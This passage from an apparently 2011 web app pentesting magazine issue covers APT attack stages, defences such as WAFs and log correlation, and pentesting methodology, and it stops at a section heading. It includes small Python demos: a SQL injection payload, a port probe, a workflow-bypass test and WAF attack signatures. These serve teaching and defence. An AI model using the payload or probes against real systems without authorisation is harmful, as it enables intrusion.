

EDITOR'S NOTE

Have you ever wondered how important the security of web applications is for IT security? The brand new November issue of Web App Pentesting magazine will attempt to provide you with some answers. This new Web App Pentesting features information about web application security and vulnerabilities. For the first time we would like to present the penetration testing topic from the web application point of view, and we publish articles about how important pentesting is in web application security. We gathered very good articles from different sources to give you a deep insight into this matter.

In the November issue you will find a very good article on the significance of the HTTP protocol and the Web for Advanced Persistent Threats, written by Matthieu Estrade. He shows us the importance of APT attacks. The article is an exhaustive mini-guide to APT and to how particular threats can be defined as APTs. Go to page 6 to find out more about APT.

Go to pages 12-21 to read the articles about web application security. The first article, written by Bryan Soliman, is Web Application Security and Penetration Testing. He introduces you to the nature of pen testing for web applications. I think that most of you will find this article a very useful and informative overview of web application security. Just read page 12.

Web application vulnerabilities: two great articles cover important aspects of this matter. I would like to introduce you to Herman Stevens' article Pulling legs of Arachni, an analysis of the Arachni web application vulnerability scanner. More on page 22. The second article worth reading is XSS BeEF Metasploit Exploitation, written by Arvind Doraiswamy. The author describes cross-site scripting with all its practical aspects on page 30. All the articles are very interesting, and they deserve to be marked as Need to Be Read!

As always, I thank the beta testers and proofreaders for their excellent work and dedication to help make this magazine even better. Special thanks to all the authors that helped me create this issue. I would like to mention some supporters this time and thank Jeff Weaver, Daniel Wood and Edward Wierzyn for their help and gorgeous ideas. They work really hard to get the magazine out for you to read. I would also like to thank all the other helpers for their contribution to the magazine.

Last but not least, I would like to welcome Ryk Edelstain to our Advisory Board! Ryk has over 30 years of experience in IT security. As he describes himself: I have a profound understanding of technology, and the practices behind penetration testing. Although I work with other technical resources to handle the technical aspect of IT threat assessment, my training is in TSCM (Technical Surveillance CounterMeasures) for the detection and neutralization of both analogue and digital surveillance technologies. In fact, the practices and processes I have learned in TSCM parallel those of PT, where the environment is assessed, a strategy and process is defined, and a documented and methodical process is executed. Results are continually evaluated at each step, and as the environment is learned the process is refined and executed until the assessment is complete. Ryk will help us make PenTest even more worth reading!

Enjoy reading the new Web App Pentesting!
Katarzyna Zwierowicz & the PenTest team

Web Application Security and Vulnerabilities

ADVANCED PERSISTENT THREATS

06

The significance of HTTP and the Web for Advanced Persistent Threats
by Matthieu Estrade

The means used to achieve an APT are often substantial and proportional to the criticality of the targeted data, notes Matthieu Estrade. The author claims that APTs are not just temporary attacks, but real and constant threats with latent effect that need to be fought in the long run. The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simplify security operations. Real-life experience of application management highlights the difficulties in implementing all the good practices. You can find out how important APT is by reading the article.

12

WEB APP SECURITY


Web Application Security and Penetration Testing
by Bryan Soliman

The author shows the importance of penetration testing in web application security. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of the vulnerabilities found in the discovery phase. Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications.

20

Developers are from Venus, Application Security guys from Mars
by Paolo Perego

We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code. Paolo Perego shows in his article how difficult the communication between these two groups is.

22

WEB APP VULNERABILITIES


Pulling legs of Arachni
by Herman Stevens

Herman Stevens shows us an in-depth analysis of Arachni, a fire-and-forget (or point-and-shoot) web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. Step by step, the author acquaints us with the process of installing and using the program, and clearly shows us the advantages and disadvantages of Arachni.

30

XSS BeEF Metasploit Exploitation


by Arvind Doraiswamy

Cross-site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code. In this article, Arvind Doraiswamy shows us how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF.

TEAM

Editor: Katarzyna Zwierowicz katarzyna.zwierowicz@software.com.pl
Betatesters: Jeff Weaver, Daniel Wood, Edward Wierzyn, Davide Quarta
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic ewa.dudzic@software.com.pl
Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca andrzej.kuca@software.com.pl
Marketing Director: Ewa Dudzic ewa.dudzic@software.com.pl
Publisher: Software Press Sp. z o.o. SK, 02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

To create graphs and diagrams we used program by
Mathematical formulas created by Design Science MathType

34

Cross-site request forgery. In-depth analysis


by Samvel Gevorgyan

Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of an authorized user. Samvel Gevorgyan describes step by step how to deal with the CSRF vulnerability.

WEB APPS CHECKING

38

First the Security Gate, then the Airplane


by Olivier Wai

Olivier Wai tries to answer the question: What needs to be heeded when checking web applications? Any web application, old or new, needs to be secured by a Web Application Firewall (WAF) in full proxy mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. If penetration testers are not only looking for a security snapshot, but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.


DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.


ADVANCED PERSISTENT THREATS

The Significance of HTTP and the Web for Advanced Persistent Threats

Initially created in 1989 by Tim Berners-Lee at CERN, the Hypertext Transfer Protocol (HTTP) was actually launched one year later and still uses specifications that date to 1999: a mere time lapse of twenty-two years in the transmission of Web-based content.

The omnipresence of the Web is now a given, and it serves a wide variety of situations, as detailed in the non-exhaustive list below:

Community applications
Institutional web sites
Online transactions
Business applications
Intranet/Extranet
Entertainment
Medical data
Etc.

In response to user requirements and developing needs, content driven by HTTP has become increasingly rich and dynamic. It even goes as far as incorporating script languages that transform the web browser into a universal enhanced client spanning different platforms: PC, Mac and mobile users all form part of the connected masses operating on their chosen platforms. But have these new privileges arrived without any underlying constraints? The race towards sophistication has not been accompanied by similar developments in respect of the security and reliability of data circulated across the Web. A concrete example is the fact that HTTP does not provide native support for sessions, and it is therefore difficult to be sure that requests received during browsing emanate from the same user.

Large scale use of the Web illustrates the discrepancy that exists in terms of security versus volume, and this inherent flaw has become a major IT system issue, making HTTP a preferred vector of attacks and data compromise. Cybercriminals are aware of the exploitability of the Web and have made it their number one target. Not a week goes by without an organization being compromised via HTTP:

PlayStation Network (Sony) -> WordPress version problem
MySQL (Oracle) -> SQL injection
RSA (EMC) -> SQL injection
TJX -> SQL injection

The above attacks, conceived and carried out with precise attention to logistics, are by no means an innovation, but we now refer to them differently, using the term APT: Advanced Persistent Threat. Bolstered cyber-activity, the discovery of intrusions and updated legislation entailing mandatory declaration of incidents collectively lead to extensive media coverage, which in turn amplifies the impact on the image of the unfortunate victims, more often than not high-profile businesses or international organizations.
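To illustrate the class of flaw behind several of the breaches listed above, here is a minimal Python sketch, with a throwaway in-memory database and hypothetical table names, contrasting an injectable query with a parameterized one:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "' OR '1'='1"  # classic injection payload

# Vulnerable: the input is concatenated into the SQL string, so the
# payload rewrites the WHERE clause and matches every row.
rows = conn.execute(
    "SELECT * FROM users WHERE name = '" + user_input + "'").fetchall()
print(len(rows))  # 1 -> the row leaks despite the bogus name

# Safe: a parameterized query treats the input as a literal value.
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()
print(len(rows))  # 0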


Anatomy of an APT

Advanced Persistent Threats are attacks calculated for latent effect and vested with a specific purpose: that of retrieving sensitive or critical data. Several steps are necessary to reach the goal:

The initial intrusion
Continued presence within the IT system
Bounce mechanisms and in-depth infiltration
Data extraction

HTTP plays an important role during these attacks, firstly because it is predominantly present during the various stages, and furthermore because it is often the only available protocol that can serve as an attack vector.

The Initial Intrusion

The system is invaded by an attack focused on an area exposed to the public on the Internet. In the case of the Sony PlayStation Network, for instance, the intrusion took place via their blog, which used a vulnerable version of WordPress. These days it is unusual for any organization to do without a website, and the latter can range from basic and simple to complex and dynamic. The website plays the role of a gateway that provides the initial point of entry into an infrastructure. It becomes an outpost that enables important information to be gathered in order to successfully carry out the rest of the attack.

Continued Presence

After the initial inroads into the structure, the next phase requires that presence within the system remains secure. The machine has to be re-accessed and exploited without arousing the suspicions of system administrators. The use of HTTP may be required because the different areas are often filtered, leaving only the necessary protocols open. HTTP is often left open to allow administrators to navigate through these machines, or to update them. To remain as stealthy as possible, a strategic backdoor to the web application or the application server will use HTTP as a direct connection and/or as a tunnel to other applications. This way it will not be filtered, and no attention will be drawn to a process that opens a port unknown to the system.

Bounce Mechanisms

Depending on the application infrastructure location and lack of compartmentalization, it is possible for a simple, scarcely-used application to be found near or on the same server as a business application. The attack will bounce from the one to the other, and the business application will then become accessible and provide more access privileges. Retrieval of information is often the vital issue during the bounce mechanism and the extended infiltration into the system. Some examples of the data targeted:

User passwords
Hardware and network destinations -> discovery
Connectors to other systems -> new protocols
Etc.

Whenever changes occur within an IT system, the steps involving initial intrusion and continued presence are repeated as many times as necessary until the goal is attained and sensitive data becomes accessible. HTTP once again comes into play during these stages because it is predominantly active and open between the different areas:

Dialogue between server applications
Web services
Web administration interfaces
Etc.

It often happens that security policies contain the same weaknesses from one area to another:

Exit ports left open
Filtering omissions on higher-level ports
Use of the same default passwords

Data Extraction

Once crucial information is reached, it is necessary to quit the system as discreetly as possible and over a certain length of time. HTTP is often enabled for exit without being monitored, for several reasons:

Machines are often updated using HTTP
When an administrator logs on to a remote machine, he will often require access to a website
Since these areas are often regarded as safe zones, restrictions are lower and controls less strict

What Protective Measures Can Be Deployed?
Application security has become a major issue in the business world. Whereas network security is fairly conventional and primarily leans on the filtering of destinations, sources, IPs and ports, application security is more complex: it involves applications that are often unique, bespoke, and deployed with many more specifications relating to infrastructure. Three steps are necessary to prevent or respond properly to an APT:

Prevention
Response
Forensics
Prevention

Ideally, security should be addressed at the very beginning, when the software and even the application infrastructure are still at the conception stage. It is necessary to follow certain rules which will condition the response to different threats.

Risk analysis and attack guidelines

This step allows a precise understanding of the risks, based on the data manipulated by the applications. It has to be carried out by studying the web applications, their operation and their business logic. Once each data component has been identified, it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure.

Developer Training

Applications are commonly developed following specific business imperatives, and often with the added stress of meeting availability deadlines. Developers do not place security high on their list of priorities, and it is often overlooked in the process. However, there are several ways to significantly reduce risk:

Raising developer awareness of application attacks (OWASP Top 10, WASC TC v2)
The use of libraries to filter input (libraries are available for all languages)
Setting up audit functions, logs and traceability
Accurate analysis of how the application works

Define a Secure Application Infrastructure

Partition the Network

This measure is one of the pillars of PCI DSS, and for good reason. Keeping sections separate can limit the impact of an intrusion, making it more difficult for the attacker to obtain satisfaction because of the large number of bounces required to reach sensitive data. Each zone also deploys a security policy adapted to its content, whether the flow is inbound or outbound. Moreover, partitioning allows for easier forensic analysis in case of a compromise: it is easier to understand the steps and measure the impact and depth of an attack when one is able to analyze each area separately. Unfortunately, there are many systems, described as flat infrastructures, that house a variety of applications in the same area. After an incident has occurred, it is difficult to determine precisely which applications have been compromised and what data has been hijacked.

Separation of Applications

Applications can be separated using criteria such as data categorization or the level of risk attached to the application. Clustering provides numerous advantages:

It promotes rationalization in the design of security policies, which are more or less complex depending on the type of data and the structure of the application to secure
It enhances understanding of an attack, and by doing so facilitates the search for evidence, which will then be based on the criticality of the data and the complexity of the applications

Anticipate Possible Outcomes

To better understand the scope of an attack, it is necessary to anticipate the options available to a hacker once an application has been compromised. Once this is done, it is necessary to anticipate the procedures required to analyze, verify and understand the attack. We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident. In such a case, it is necessary to predefine the tools and procedures for investigations and/or monitoring.

Regular Auditing

Code analysis

You can resort to manual code analysis by an auditor, or to automated analysis using the available tools to find vulnerabilities in the source code of web applications. These tools often require complex configuration. This step is useful to detect vulnerabilities before going into production, and thus to fix them before they are exploited. Unfortunately, the practice is only possible if you have access to the source code of the application; closed-source software packages cannot be analyzed.
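To make the idea concrete, here is a deliberately naive Python sketch of the kind of pattern an automated source analyzer hunts for. Real tools are far more sophisticated; the pattern below is only illustrative:

import sys

def scan(path):
    """Flag lines where SQL appears to be built from strings rather
    than passed as parameters -- a crude stand-in for real analysis."""
    with open(path, encoding="utf-8") as handle:
        for number, line in enumerate(handle, start=1):
            if "execute(" in line and ("+" in line or "%" in line or 'f"' in line):
                print(f"{path}:{number}: possible SQL built from strings")

if __name__ == "__main__":
    for filename in sys.argv[1:]:
        scan(filename)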
Scanning and penetration testing

All applications can be scanned and pentested. These tests also require configuration and/or a thorough analysis of the application, to determine the credentials necessary for navigation and the resources to be avoided because of their capacity to cause significant damage (e.g. links enabling the deletion of entries in the database). These tests have to be reproduced as often as possible, and whenever developers put a change to the application in place.

Appropriate Response

Traditional firewalls do not filter application protocols; at best, the so-called next-generation models can recognize a type of protocol and filter content in the manner of an IPS, by recognizing attack patterns. This response is clearly inadequate. Each zone containing web applications has to be filtered on incoming and outgoing content and on the use of the protocol itself. This type of deployment is often called defense in depth, and it has the ability to monitor the various attacks at both the application and network levels. Last but not least, the association of an identity context with the security policy allows better detection of anomalies.

Traffic Filtering: The WAF (Web Application Firewall)

Web application firewalls can be considered as an extension of network firewalls. They are able to analyze HTTP and the content it conveys. The device is strongly recommended by section 6.6 of PCI DSS. Often used in reverse proxy mode, a WAF allows for a break in the protocol and facilitates the restructuring of areas between applications. The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate the different vendors as needed. The WAF also helps to monitor and alert in case of threat, in order to trigger a rapid response (e.g. blocking the IP of the attacker via a dialogue protocol with network firewalls).

Traffic Filtering: The WSF (Web Services Firewall)

The WSF is an extension of the WAF to the protocols carrying XML traffic over HTTP, such as SOAP or REST. XML and its standards make security management easier in the sense that the operation of the service is described by documents generated directly by the development framework (e.g. WSDL, schemas). Web services are vulnerable to the same attacks as web applications; they consequently need the same kind of protection. Their position in the application infrastructure, however, is much more critical: they are often located at the heart of sensitive information zones, and connected directly via private links to partner infrastructures. The WSF provides security on the message format and content, but also on the use of a service. The use or production of a web service entails a contract between the two parties on the type of use (e.g. number of messages per day, data type, etc.). The WSF will also serve to monitor this function and to ensure respect of the SLA between the two parties.
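As a toy illustration of the inbound filtering such a device performs, here is a minimal WSGI middleware sketch in Python. The patterns and port are illustrative only; a real WAF inspects far more than a short blacklist:

import re
from urllib.parse import unquote
from wsgiref.simple_server import make_server

# Crude signatures in the spirit of a WAF blacklist rule set.
ATTACK_PATTERNS = [
    re.compile(r"(?i)<script"),          # reflected XSS probe
    re.compile(r"(?i)union\s+select"),   # SQL injection probe
    re.compile(r"\.\./"),                # path traversal probe
]

def waf_middleware(app):
    """Reject requests whose query string matches a known-bad pattern."""
    def guarded(environ, start_response):
        query = unquote(environ.get("QUERY_STRING", ""))
        if any(p.search(query) for p in ATTACK_PATTERNS):
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"Request blocked"]
        return app(environ, start_response)
    return guarded

def app(environ, start_response):
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"Hello"]

if __name__ == "__main__":
    make_server("127.0.0.1", 8000, waf_middleware(app)).serve_forever()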

Authentication, Authorization

Applications use identities to control access to various resources and functions. The association of the identity context and security increases efficiency in the detection of anomalies. For example, a whitelist adapted according to the type of user can verify access to information based on the user's role.

Ensuring Continuity of Service

Application security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes. However, some attacks based on weaknesses can be devastating in effect, perpetrated to make the application unavailable and thereby provoke losses due to activity downtime. To retaliate, it is necessary to establish protective measures that block denial of service and automated processes, and to ensure load balancing and SSL acceleration.

Operation

Monitoring

It is important to understand the use of the application during production, to monitor and detect abnormal behavior, and to make decisions accordingly:

Blacklisting
Legal action
Redirection to a honeypot
Log Correlation

Understanding abnormal behavior in an application helps in locating an attack. An application infrastructure can comprise hundreds of applications. To understand an attack as a whole and monitor its changes (discovery, aggression, compromise), it is necessary to have a holistic view. To do this, it is imperative to confront and correlate logs, to obtain a real-time overall analysis and understand the threat mechanics:

Mass attacks on a type of application
Attacks targeting a specific application
Attacks focused on a type of data
Unknown daemons or unusual groups and users
Etc.
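As a minimal illustration of the idea, the Python sketch below correlates failed logins across applications in a hypothetical consolidated log format. A single application would see only noise, while the holistic view reveals a campaign:

from collections import Counter

# Hypothetical combined access log: timestamp, source IP, application, path, status.
LOG_LINES = [
    "2011-11-02T03:12:44 198.51.100.7 shop /login 401",
    "2011-11-02T03:12:45 198.51.100.7 blog /wp-login.php 401",
    "2011-11-02T03:12:46 198.51.100.7 intranet /login 401",
]

def correlate(lines, threshold=3):
    """Flag a source IP that fails logins across several applications."""
    failures = Counter()
    for line in lines:
        _, src, app, _, status = line.split()
        if status == "401":
            failures[src, app] += 1
    # Count how many distinct applications each source has probed.
    by_source = Counter(src for (src, _app) in failures)
    return [src for src, apps in by_source.items() if apps >= threshold]

print(correlate(LOG_LINES))  # ['198.51.100.7']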

Reporting and Alerting

The dialogue between application, network and security teams is often complex within an organization. Formalized reports on attacks and on the use of the application provide these teams with a basis for work and an understanding of application threats. Alerts will enable them to react and trigger procedures, either at the network level by blocking the IP of the attacker, at the application level by forbidding access to resources or areas, or more directly by referral to a honeypot in view of analyzing the behavior of the attacker.

Forensics

Understanding the scope of an attack

For each area compromised, it is important to understand what elements have been impacted, and to trace the attack back to the roots of the intrusion: the compromise through the installation of a backdoor, the bounce mechanisms to other areas, and/or the extraction of data.

Analysis of application components

To understand how the intrusion occurred, it is important to look for abnormal uses. One example could be the presence of anomalous data in a variable or a cookie. To drill down to this level, the logs of the various application components turn out to be very useful:

Web server or application
Database
Directory
Etc.

Systems Analysis

To understand how the attacker remained in the area, it is important to identify the type of backdoor used. From the simplest act, such as placing an executable file in the application itself, to the injection of code into a process (e.g. hooking network functions), it is necessary to analyze the system hosting the application, looking for:

Changed configuration files
Users added
Security rules changed
Errors of execution or increases in privileges

Analysis of network equipment

During the various bounces within the application infrastructure, the discovery and exploration of new possibilities leaves fingerprints. Network firewalls keep precious logs with traces of these attempts. In addition, if access is logged, it is important to check whether there are connections to web applications at unusual times.

The End justifies the Means

In conclusion, we can see that the means used to achieve an APT are often substantial and proportional to the criticality of the targeted data. APTs are not just temporary attacks, but real and constant threats with latent effect that need to be fought in the long run. The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simplify security operations. Real-life experience of application management highlights the difficulties in implementing all the good practices. A comprehensive study of threats, an appropriate response and the anticipation of possible incidents are now the recommended procedure in dealing with application attacks.
MATTHIEU ESTRADE

Matthieu Estrade has 14 years of experience in internet security. In 2001, Matthieu designed a pioneering application firewall based on web reverse proxy technology for the company Axiliance. As a well known specialist in his field, he soon became a member of the Open Source Apache HTTP server development team. His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC. Matthieu is also a member of the French OWASP chapter. Matthieu is currently CTO at BeeWare.


WEB APP SECURITY

Web Application Security and Penetration Testing
In recent years, web applications have grown dramatically within many organizations and businesses, which have become very dependent on this technology as part of their business lifecycle.

Dynamic web applications usually use technologies such as ASP, ASP.NET, PHP, Ajax, JSP, Perl, ColdFusion and Flash. These applications expose financial data, customer information, and other sensitive and confidential data that require authentication and authorization. Ensuring that web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications. With the accessibility of such critical data to the public domain, web application security testing also becomes a paramount process for all web applications that are exposed to the outside world.

Introduction

Penetration testing (also called pen testing) is usually conducted by ethical hackers, where the security team reviews application security vulnerabilities to discover potential security risks. Such a process requires deep knowledge, experience with a variety of different tools, and a range of exploits that can achieve the required tasks. During pen testing, different web application vulnerabilities are tested, e.g. input validation, buffer overflow, cross-site scripting, URL manipulation, SQL injection, cookie modification, bypassing authentication, and code execution. A typical pen test involves the following procedures:

Identification of Ports: ports are scanned, and the associated services running on them are identified.
Software Services Analysis: both automated and manual testing is conducted to discover weaknesses.
Verification of Vulnerabilities: this process helps verify that the vulnerabilities are real, so that exploitable weaknesses can be remediated.
Remediation of Vulnerabilities: the vulnerabilities are resolved and re-tested to ensure they have been addressed.

Part of the initiative of securing web applications is to include the security development lifecycle as part of the software development lifecycle, so that the number of security-related design and coding defects, as well as the severity of any defects that do remain undetected, can be reduced or eliminated. Despite the fact that these initiatives solve some of the security problems, some undiscovered defects will remain even in the most scrutinized web applications. Until scanners can harness true artificial intelligence, put anomalies into context and make normative judgments about them, the struggle to find certain vulnerabilities will persist.
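As a minimal illustration of the first procedure, identification of ports, the following Python sketch probes a handful of common TCP ports using only the standard library. The target address is a placeholder, and such probes should only ever be run against systems you are authorized to test:

import socket

TARGET = "127.0.0.1"           # placeholder: an authorized test host
COMMON_PORTS = [21, 22, 25, 80, 110, 143, 443, 3306, 8080]

def probe(host, port, timeout=0.5):
    """Return True if a TCP connect() to host:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0

open_ports = [p for p in COMMON_PORTS if probe(TARGET, p)]
print(f"Open on {TARGET}: {open_ports}")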

Automated Scanning vs. Manual Penetration Testing

A vulnerability assessment simply identifies and reports vulnerabilities, whereas a pen test attempts to exploit them to determine whether unauthorized access or other malicious activity is possible. By performing a pen test to simulate an attack, it is possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application. With more than 75% of attacks occurring over the HTTP/S protocols, and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur at the front door of the organization, doors the entire online community has access to (i.e. port 80 and port 443). With the complexity and the tremendous amount of sensitive data existing within web applications, consumers not only expect, but also demand security for this information. That said, securing a web application goes far beyond testing the application using automated systems and tools or manual processes. Security implementation begins in the conceptual phase, where the security risk introduced by the application is modeled together with the countermeasures that are required. It is imperative that web application security be thought of as another quality vector of every application, one that has to be considered through every step of the application lifecycle. Discovering web application vulnerabilities can be performed through different processes:

An automated process, where scanning tools or static analysis tools are used.
A manual process, where penetration testing or code review is used.

Web application vulnerability types can be grouped into two categories:

Technical Vulnerabilities

Where such vulnerabilities can be examined through tests such as cross-site scripting, injection flaws and buffer overflow. Automated systems and tools which analyze and test web applications are much better equipped to test for technical vulnerabilities than manual penetration tests. While automated testing and scanning tools may not be able to address 100% of all technical vulnerabilities, there is no reason to believe that they will achieve that goal in the near future. Current problems facing web application tools are the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.

History has proven that software bugs, defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks and application information. It is also proven that most security breaches occur due to vulnerabilities within the web application layer (i.e. attacks using the HTTP/HTTPS protocol). In such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection.

Security analyses review the critical components of a web-based portal, e-commerce application, or web services platform. Part of the analysis work is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database or the web server used by the application. It is imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon the evaluation of the integration between components (e.g. third-party components and in-house built components) and the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. Application penetration assessments serve as a cost-effective mechanism to identify a set of vulnerabilities in a given application: they expose the most likely exploitable vulnerabilities and allow similar instances of vulnerabilities to be found throughout the code.

Logical Vulnerabilities

Where such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow or how the application works in general. Understanding the logic and flow of an application allows manual pen testing to subvert the business logic and expose security vulnerabilities. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C, bypassing the security validation at point B.

Figure 1. The different activities of the Pen Testing processes
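To make the point-A-to-point-C bypass concrete, here is a sketch of how a tester might probe it using the third-party Python requests library. The URLs, parameters and workflow are hypothetical:

import requests  # third-party HTTP client

BASE = "https://app.example.test"   # hypothetical application under test
session = requests.Session()

# Point A: start the workflow normally to obtain a session.
session.post(BASE + "/checkout/start", data={"item": "42"})

# Point C requested directly, skipping the validation step at point B.
response = session.post(BASE + "/checkout/confirm", data={"item": "42"})

# If the application only enforces its checks in the point-B page's UI,
# the confirm step may succeed without ever passing validation.
print(response.status_code)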

How Does Web Application Pen Testing Work?

Most web application penetration testing is carried out from security operations centers, where the resources under test are accessed remotely over the Internet using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g. commercial enterprise web applications, internally developed applications, web-based portals, and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process, such as application spidering, authentication testing, session management testing, data validation testing, web service testing, Ajax testing, business logic testing, risk assessment, and reporting. In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment:

Zero-Knowledge Test (Black Box): the application security testing team has no inside information about the target environment, and the expected knowledge gain is based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
Partial Knowledge Test (Gray Box): partial knowledge of the environment under test is obtained before conducting the test.
Source Code Analysis (White Box): the penetration test team has full information about the application and its source code. In such a test, the security team does a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial of service attack against it, or use such flaws to gain access to the internal network.

It is also important to point out that penetration testing can be achieved through two different types of testing:

External Penetration Testing
Internal Penetration Testing

Both types can be conducted with minimal prior information (black box) or with partial to full information (gray or white box).

Figure 2. The different phases of the Pen Testing



Figure 3 shows the different procedures and steps that can be used to conduct the penetration testing:

Scope and Plan: the scope of the penetration testing is identified, and the project plan and resources are defined.
System Scan and Probe: the systems within the defined scope are scanned; automated scanners examine the open ports and probe the systems to detect vulnerabilities, using the hostnames and IP addresses previously collected.
Creating Attack Strategies: the testers prioritize the systems and the attack methods to be used, based on the type of each system and how critical it is. The penetration testing tools are also selected at this stage, based on the vulnerabilities detected in the previous phase.
Penetration Testing: vulnerabilities are exploited using the automated tools and the attack methods designed in the previous phase, covering tests such as data and service pilferage, buffer overflow, privilege escalation, and denial of service (if applicable).
Documentation: all the vulnerabilities discovered during the test are documented; evidence of exploitation and the penetration testing findings are also recommended to be presented later within the final report.
Improvement: the final step is to provide the corrective actions for closing the discovered vulnerabilities within the systems and web applications.

Web Application Testing Tools

Throughout pen testing, a structured methodology has to be followed, with steps such as enumeration, vulnerability assessment and exploitation. Some of the tools that might be used within these steps are:

Port scanners
Sniffers
Proxy servers
Site crawlers
Manual inspection

The output from the above tools allows the security team to gather information about the environment: open ports, services, versions, and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s) and any intermediary devices such as firewalls and load balancers. It is also important for the security team not to rely solely on tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields, and HTML page sources should be part of the security assessment as well (see the sketch below). Some of the areas that can be covered during the vulnerability assessment are the following:

Input validation
Access control
Authentication and session management (session ID flaws) vulnerabilities
Cross-site scripting (XSS) vulnerabilities
Buffer overflows
Injection flaws
Error handling
Insecure storage
Denial of service (if required)
Configuration management
Business logic flaws
SQL injection faults
Cookie manipulation and poisoning
Privilege escalation
Command injection
Client-side and header manipulation
Unintended information disclosure

Figure 3. Testing techniques, procedures and steps
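Manual inspection of hidden fields, mentioned above, is easy to bootstrap with a short script. The following Python sketch collects hidden form fields from a page using only the standard library; the URL is a placeholder for an authorized test target:

from html.parser import HTMLParser
from urllib.request import urlopen

class HiddenFieldFinder(HTMLParser):
    """Collect <input type="hidden"> fields from an HTML page."""
    def __init__(self):
        super().__init__()
        self.fields = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and attrs.get("type") == "hidden":
            self.fields.append((attrs.get("name"), attrs.get("value")))

page = urlopen("http://127.0.0.1:8000/form").read().decode("utf-8")
finder = HiddenFieldFinder()
finder.feed(page)
for name, value in finder.fields:
    print(f"hidden field {name!r} = {value!r}")  # candidates for tampering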

During the assessment, testing for the above vulnerabilities is performed, except for those that could cause denial-of-service conditions; these are usually discussed beforehand. Possible options for denial-of-service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations and comments are summarized, and better solutions are suggested for the implementation process. Once the above assessments are done, the penetration test is half-way done, and the most important part of the assessment has to be delivered: the informative report that highlights all the risks found during the penetration phase. The following are some of the commonly used tools for traditional penetration testing:

Port Scanners

Such tools are used to gather information about which network services are available for connection on each target host. The port scanning tool examines or questions each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is the ability to determine the operating system type and version number, since TCP/IP protocol implementations can vary in their specific responses. The configuration flexibility in port scanners serves to examine different port configurations, as well as to hide from network intrusion detection mechanisms.

Vulnerability Scanners

